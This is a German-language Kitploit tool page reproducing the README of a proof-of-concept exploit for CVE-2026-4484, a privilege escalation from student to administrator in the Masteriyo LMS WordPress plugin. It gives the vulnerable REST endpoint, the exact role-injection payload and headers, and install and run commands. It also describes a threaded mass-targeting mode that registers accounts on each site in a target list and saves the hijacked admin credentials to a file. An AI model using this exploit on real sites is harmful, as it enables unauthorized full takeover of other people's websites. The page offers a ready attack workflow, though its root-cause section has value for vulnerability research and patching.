Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-4484 — Masteriyo LMS <= 2.1.6 – Fehlende Autorisierung für authentifizierte (Student+) Benutzer: Privilegienerweiterung zum Administrator | Kitploit
Tools/GitHubGitHub/nxploited/cve-2026-4484
Authentifizierung & AutorisierungPrivilege EscalationSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubnxploited/cve-2026-4484

CVE-2026-4484

Masteriyo LMS <= 2.1.6 – Fehlende Autorisierung für authentifizierte (Student+) Benutzer: Privilegienerweiterung zum Administrator

Repository anzeigen
11vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-4484

Masteriyo LMS <= 2.1.6 - Fehlende Autorisierung führt zu authentifizierter (Student+) Privilegieneskalation zum Administrator

Typing SVG


🔴 Schwachstellenübersicht

CVE-2026-4484 — Authentifizierte Privilegieneskalation (Student → Administrator)

FeldDetails
CVE-IDCVE-2026-4484
SchweregradHOCH — CVSS v3.1-Wert: 8.8
VektorCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
Betroffene SoftwareMasteriyo-LMS-Plugin für WordPress
Betroffene VersionenAlle Versionen bis einschließlich 2.1.6
SchwachstellentypPrivilegieneskalation (Rollenmanipulation)
Erforderliche AuthentifizierungJa — Student-Level oder höher
CWECWE-269: Unzureichende Privilegienverwaltung

Beschreibung:
Das Masteriyo-LMS-Plugin für WordPress ist in allen Versionen bis einschließlich 2.1.6 anfällig für Privilegieneskalation. Die Schwachstelle hat ihren Ursprung in der Funktion InstructorsController::prepare_object_for_database, die bei REST-API-Anfragen die Rollenzuweisung nicht ordnungsgemäß einschränkt. Ein authentifizierter Angreifer mit lediglich Student-Level-Zugriff kann eine speziell gestaltete POST-Anfrage an den Masteriyo-REST-API-Endpunkt senden — indem er "roles": ["administrator"] in die Anfrage-Nutzdaten einfügt — und so sein Konto stillschweigend zum WordPress-Administrator erweitern, was eine vollständige Übernahme der Website ohne jegliche administrative Interaktion ermöglicht.


🛠️ Tool-Beschreibung

Dies ist ein Proof-of-Concept-Exploit-Skript (PoC), das sich gegen WordPress-Installationen richtet, die eine verwundbare Version des Masteriyo-LMS-Plugins ausführen. Das Tool unterstützt zwei Angriffsmodi:

ModusNameAblaufAnwendungsfall
1Nx_1Registrieren → Anmelden → Eskalieren → Admin verifizierenFrischer Angriff — kein bestehendes Konto erforderlich
2Nx_2Anmelden → Eskalieren → Admin verifizierenBestehendes Konto vorhanden (Student/Dozent)

Angriffsablauf

[Register / Login as Student]
         ↓
[Fetch Dashboard Context — user_id + nonce]
         ↓
[POST /wp-json/masteriyo/v1/users/instructors/{id}]
[Payload: {"roles": ["administrator"]}]
         ↓
[Re-login with fresh session]
         ↓
[Verify /wp-admin access → confirmed Administrator]
         ↓
[Write to Login_admin.txt]

📋 Anforderungen

Systemanforderungen

  • Python 3.8 oder höher
  • Linux / Windows / macOS

Python-Abhängigkeiten

pip install requests urllib3 colorama

Oder über die Requirements-Datei:

pip install -r requirements.txt

requirements.txt:

requests>=2.28.0
urllib3>=1.26.0
colorama>=0.4.6

🚀 Installation

# Clone the repository
git clone https://github.com/Nxploited/CVE-2026-4484.git
cd CVE-2026-4484

# Install dependencies
pip install -r requirements.txt

# Run the tool
python3 CVE-2026-4484.py

⚙️ Verwendung

Grundlegender Start

python3 CVE-2026-4484.py

Das Tool verwendet eine interaktive Terminal-Oberfläche — alle Parameter werden zur Laufzeit abgefragt.


🗂️ Format der Zielliste

Erstellen Sie eine einfache Textdatei (z. B. list.txt) mit einem Ziel pro Zeile:

https://target1.com
https://target2.com
http://target3.com/wordpress

🟥 Modus 1 — Nx_1 (Registrieren + Anmelden + Eskalieren)

Verwenden Sie diesen Modus, wenn Sie kein bestehendes Konto auf dem Ziel haben. Das Tool registriert automatisch ein neues Studentenkonto und eskaliert es anschließend.

Select mode (1=Nx_1, 2=Nx_2) [2]: 1
Targets list file (one host/URL per line) [list.txt]: list.txt
Threads (concurrent sites) [5]: 5
HTTP timeout (seconds) [10]: 10
Username to register (Nx_1) [Nxploited]: Nxploited
Email to use for registration+login (Nx_1) [[email protected]]: [email protected]
Password to use (Nx_1) [Nx_admin]: Nx_admin123!

Automatisch ausgeführte Schritte:

  1. GET /account/signup/ → Registrierungs-Nonce extrahieren
  2. POST /st/ → neues Konto als Student registrieren
  3. GET /account/ → Login-Nonce extrahieren
  4. POST /wp-admin/admin-ajax.php → über Masteriyo-AJAX anmelden
  5. GET /account/#/dashboard → current_user_id + nonce extrahieren
  6. POST /wp-json/masteriyo/v1/users/instructors/{id} mit {"roles":["administrator"]}
  7. Mit neuer Sitzung erneut anmelden → Zugriff auf das Admin-Panel verifizieren
  8. Bestätigte Treffer in Login_admin.txt schreiben

🟩 Modus 2 — Nx_2 (Anmelden + Eskalieren — Bestehendes Konto)

Verwenden Sie diesen Modus, wenn Sie bereits über ein gültiges Studenten- oder Dozentenkonto auf dem Ziel verfügen.

Select mode (1=Nx_1, 2=Nx_2) [2]: 2
Targets list file (one host/URL per line) [list.txt]: list.txt
Threads (concurrent sites) [5]: 5
HTTP timeout (seconds) [10]: 10
Username or Email for login+escalation (Nx_2) [admin]: [email protected]
Password for that user: mypassword

Automatisch ausgeführte Schritte:

  1. GET /account/ → Login-Nonce extrahieren
  2. POST /wp-admin/admin-ajax.php → über Masteriyo-AJAX anmelden
  3. GET /account/#/dashboard → current_user_id + nonce extrahieren
  4. POST /wp-json/masteriyo/v1/users/instructors/{id} mit {"roles":["administrator"]}
  5. Mit neuer Sitzung erneut anmelden → Zugriff auf das Admin-Panel verifizieren
  6. Bestätigte Treffer in Login_admin.txt schreiben

📁 Ausgabedateien

DateiBeschreibung
Login_admin.txtAlle bestätigten Administrator-Eskalationen

Ausgabeformat

https://target.com/wp-login.php user:[email protected]|pass:Nx_admin123!

Beispiel für Terminal-Ausgabe

[OK]    https://target.com :: LOGIN OK :: success
[OK]    https://target.com :: DASHBOARD :: user_id=42 nonce=a1b2c3d4e5
[OK]    https://target.com :: ESCALATE SUCCESS :: user_id=42 username=nxploited roles=['administrator']
[OK]    https://target.com :: ADMIN SESSION VERIFIED (dashboard + plugin-install access).

🔍 Technische Details

Verwundbarer Endpunkt

POST /wp-json/masteriyo/v1/users/instructors/{user_id}

Exploit-Payload

{
  "roles": ["administrator"]
}

Erforderliche Header

Content-Type: application/json
X-WP-Nonce: <extracted_from_dashboard>

Hauptursache

Die Funktion InstructorsController::prepare_object_for_database in Masteriyo LMS verarbeitet den Parameter roles aus dem REST-Anfragekörper, ohne zu prüfen, ob der anfragende Benutzer über die Berechtigung edit_users oder promote_users verfügt. Jeder authentifizierte Benutzer (Student-Level oder höher), der diesen Endpunkt erreichen kann, kann einen beliebigen Rollenwert übermitteln — einschließlich administrator — der dann direkt in der WordPress-Benutzermetadaten-Tabelle gespeichert wird.


📡 Kontakt & Autor

Tool herunterladen